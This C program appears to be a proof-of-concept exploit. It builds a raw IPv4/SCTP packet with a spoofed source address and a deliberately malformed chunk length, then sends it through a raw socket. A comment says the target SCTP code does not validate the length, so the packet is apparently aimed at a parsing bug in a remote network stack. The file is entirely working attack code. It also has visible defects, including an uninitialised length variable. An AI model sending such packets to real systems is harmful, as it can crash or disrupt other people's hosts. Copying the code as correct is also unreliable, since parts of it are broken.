#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <arpa/inet.h>

#include "sctpHeader.h"

int
main(int argc, char *argv[])
{
	char packet[1024];
	struct iphdr *ip = (struct iphdr *)&packet;
	struct sctpHeader *sctp = (struct sctpHeader *)&ip[1];
	struct sctpChunkDesc *sctp_chunk = (struct sctpChunkDesc *)&sctp[1];
	size_t len;
	int s;
	struct sockaddr_in to;
	int n;

	ip->ihl = 5;
	ip->version = 4;
	ip->tos = 0;
	ip->id = 0;
	ip->frag_off = 0;
	ip->ttl = 255;
	ip->protocol = 132;
	ip->check = 0;
	ip->saddr = inet_addr(argv[1]);
	ip->daddr = inet_addr(argv[2]);
	ip->check = 0;

	len += sizeof(*ip);

	sctp->source = 0;
	sctp->destination = 0;
	sctp->verificationTag = 0;
	sctp->adler32 = 0;

	len += sizeof(*sctp);

	sctp_chunk[0].chunkID =0;
	sctp_chunk[0].chunkFlg = 0;
/*
ERM.. no validation (at all).
The entire code around here is pretty f* though also.

htons(chunkDescPtr->chunkLength)-1 -
sizeof(struct sctpDataPart)-sizeof(struct sctpChunkDesc));
*/

#if 1
#define N	16
#else
#define N	17
#endif

	sctp_chunk[0].chunkLength = htons(N);
#if 0
	len += N;
#endif
	len += sizeof(*sctp_chunk);

	ip->tot_len = len;
	ip->check = in_cksum(&packet, sizeof(packet));

	s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (s == -1) exit(1);
	to.sin_addr.s_addr = ip->daddr;
	to.sin_port = 0;
	to.sin_family = AF_INET;
	n = sendto(s, packet, len, 0, (struct sockaddr *)&to,
		sizeof(to));
}
